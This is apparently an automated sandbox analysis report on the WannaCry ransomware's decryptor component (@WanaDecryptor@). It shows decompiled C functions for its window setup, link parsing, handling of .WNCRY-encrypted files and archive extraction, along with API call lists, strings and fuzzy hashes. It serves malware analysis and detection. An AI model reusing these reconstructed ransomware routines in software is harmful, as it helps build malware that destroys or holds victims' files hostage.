Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF

#537.MFC42(Succeed), ref: 0040166F
#2385.MFC42(?,?,?,Succeed), ref: 00401684
#537.MFC42(Sent request), ref: 0040169F
SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
#2385.MFC42 ref: 004016D3
#537.MFC42(Connected), ref: 004016F5
SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
#2385.MFC42 ref: 00401729
#2385.MFC42(?,?,?), ref: 0040174C

Strings

Sent request, xrefs: 0040169A
Succeed, xrefs: 0040166A
Received response, xrefs: 0040162F
Connected, xrefs: 004016F0

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2385$#537$MessageSend$#3092#6199#800
String ID: Connected$Received response$Sent request$Succeed
API String ID: 3790904636-3692714192
Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}

APIs

#4710.MFC42 ref: 00404DD5
CreateSolidBrush.GDI32(?), ref: 00404DE9
#1641.MFC42(00000000), ref: 00404DF3
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
#1641.MFC42(00000000), ref: 00404E26
#3092.MFC42(00000403,00000000), ref: 00404E32
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
#3092.MFC42(00000001), ref: 00404E57
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
#3092.MFC42(00000002), ref: 00404E76
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F

Strings

Arial, xrefs: 00404DF8

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
String ID: Arial
API String ID: 1126252797-493054409
Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
#823.MFC42(00000001,?,?), ref: 00406DEC
SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
_strnicmp.MSVCRT ref: 00406E3E
_strnicmp.MSVCRT ref: 00406E5A
SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
#6136.MFC42 ref: 00406EC4
#825.MFC42(?), ref: 00406ED7

Strings

<http://, xrefs: 00406E35
T, xrefs: 00406EB4
<https://, xrefs: 00406E51

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$_strnicmp$#6136#823#825
String ID: <http://$<https://$T
API String ID: 1228111698-1216084165
Opcode ID: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
Opcode Fuzzy Hash: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9

Uniqueness

Uniqueness Score: -1.00%

Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}

APIs

wcscpy.MSVCRT ref: 0040257D
wcsrchr.MSVCRT ref: 0040258A
_wcsicmp.MSVCRT ref: 004025A5
_wcsicmp.MSVCRT ref: 004025B4
wcscat.MSVCRT ref: 004025D3
DeleteFileW.KERNEL32(?), ref: 004025F0
MoveFileW.KERNEL32(?,?), ref: 00402604
DeleteFileW.KERNEL32(?), ref: 0040262E

Strings

.WNCYR, xrefs: 004025AE
.org, xrefs: 004025CD
.WNCRY, xrefs: 0040259F

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
String ID: .WNCRY$.WNCYR$.org
API String ID: 1016768320-4283512309
Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132);
									E00411660();
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000);
										L00412CEC();
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											CloseHandle(_t174);
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}

0x0041236a
0x00412371
0x00412376
0x0041239c
0x0041239f
0x004123a6
0x004123a8
0x00412414
0x00412431
0x00412436
0x00412438
0x0041243d
0x00412445
0x00412445
0x00412450
0x00412452
0x00412463
0x00412465
0x00412482
0x0041248b
0x0041248b
0x00412496
0x0041246a
0x00412476
0x00412476
0x00412457
0x00412457
0x00412460
0x00412460
0x004123aa
0x004123aa
0x004123ad
0x004123b2
0x004123b7
0x004123b7
0x004123ba
0x004123bc
0x004123c3
0x004123c6
0x004123da
0x004123dd
0x004123e0
0x004123e5
0x004123e5
0x004123e8
0x004123ea
0x004123ed
0x004123f0
0x004123f5
0x004123f7
0x004123fa
0x004123fa
0x00412407
0x00412408
0x00412409
0x0041240e
0x00412411
0x00000000
0x004123cb
0x004123d7
0x004123d7
0x004123c6
0x00412378
0x0041237b
0x0041249c
0x0041249f
0x004124a1
0x004124a6
0x004124ab
0x004124ab
0x004124ae
0x004124b0
0x004124b3
0x004124ba
0x004124bd
0x004124d1
0x004124d4
0x004124d7
0x004124dc
0x004124dc
0x004124df
0x004124e1
0x004124e4
0x004124e7
0x004124ec
0x004124ee
0x004124f1
0x004124f1
0x004124fd
0x00412501
0x00412506
0x0041250e
0x00412578
0x0041257b
0x00412589
0x00412590
0x00412592
0x00412594
0x00412596
0x00412598
0x0041259a
0x0041259c
0x004125a2
0x004125a2
0x0041259e
0x0041259e
0x004125a0
0x00000000
0x00000000
0x004125a0
0x004125a5
0x004125a8
0x004125a9
0x004125a9
0x004125b8
0x004125ba
0x004125be
0x004125c4
0x004125ca
0x004125cd
0x004125d4
0x004125d6
0x004125d6
0x004125d8
0x0041264d
0x00412652
0x00412656
0x00412658
0x00412671
0x00412684
0x00412691
0x00412696
0x00000000
0x0041265a
0x0041265a
0x0041265c
0x00000000
0x0041265e
0x0041265e
0x00412660
0x00000000
0x00412666
0x00412666
0x0041266b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041266b
0x00412660
0x0041265c
0x00000000
0x004125da
0x004125da
0x004125df
0x004125f9
0x00412605
0x0041260a
0x0041260a
0x0041260d
0x00412630
0x0041257d
0x0041257d
0x0041257d
0x00412632
0x00412635
0x004126a6
0x004126a7
0x004126a8
0x004126ad
0x004126b3
0x004126b6
0x004126b8
0x004126ba
0x004126bf
0x004126c4
0x004126c7
0x004126c7
0x004126d3
0x004126db
0x004126f4
0x004126f6
0x004126f9
0x004126fc
0x00000000
0x00000000
0x004126fe
0x00412700
0x0041273c
0x0041273c
0x00412702
0x00412702
0x0041271a
0x0041271e
0x00412720
0x0041275f
0x00412722
0x00412722
0x00412724
0x00000000
0x00412726
0x00000000
0x00412726
0x00412724
0x00412704
0x00412714
0x00412716
0x00412718
0x00412732
0x00000000
0x00000000
0x00000000
0x00412718
0x00412702
0x00412765
0x00412765
0x0041276d
0x00412770
0x00412770
0x00412779
0x0041278f
0x00000000
0x0041278f
0x00412728
0x00000000
0x0041263a
0x00412646
0x00412646
0x00412510
0x00412510
0x00412513
0x00412524
0x0041252b
0x0041252d
0x0041252f
0x0041253f
0x00412542
0x0041254a
0x00412556
0x00412531
0x00412531
0x00412533
0x00000000
0x00412535
0x00412535
0x00412537
0x00412559
0x00412561
0x00412569
0x00412575
0x00412539
0x00412539
0x0041253d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041253d
0x00412537
0x00412533
0x00412518
0x00412518
0x00412521
0x00412521
0x00412513
0x004124c2
0x004124ce
0x004124ce
0x0041238d
0x00412399
0x00412399
0x0041237b
0x00000000

Strings

%s%s%s, xrefs: 004125F3
:, xrefs: 00412666
%s%s, xrefs: 0041267E

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:
API String ID: 0-3034790606
Opcode ID: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
Opcode Fuzzy Hash: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA

Uniqueness

Uniqueness Score: -1.00%

Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				 *(__p__fmode()) =  *0x42228c;
				 *(__p__commode()) =  *0x422288;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_v112 =  *0x422284;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}

0x00413105
0x00413107
0x0041310c
0x00413117
0x00413118
0x00413125
0x0041312a
0x0041312f
0x00413136
0x0041313d
0x00413150
0x0041315e
0x00413167
0x0041316c
0x00413171
0x00413177
0x0041317e
0x00413184
0x00413185
0x0041318a
0x0041318f
0x00413194
0x0041319e
0x004131b7
0x004131bd
0x004131c2
0x004131c7
0x004131d4
0x004131d6
0x004131dc
0x00413218
0x0041321d
0x0041321e
0x0041321e
0x004131de
0x004131de
0x004131de
0x004131df
0x004131e2
0x004131e4
0x004131ef
0x004131f1
0x004131f1
0x004131f2
0x004131f2
0x004131ef
0x004131f5
0x004131f9
0x00000000
0x00000000
0x004131ff
0x00413206
0x00413210
0x00413225
0x00413212
0x00413212
0x00413212
0x00413231
0x00413236
0x0041323a
0x00413240
0x00413245
0x00413247
0x0041324a
0x0041324b
0x0041324c
0x00413253

APIs

__set_app_type.MSVCRT ref: 0041312F
__p__fmode.MSVCRT ref: 00413144
__p__commode.MSVCRT ref: 00413152
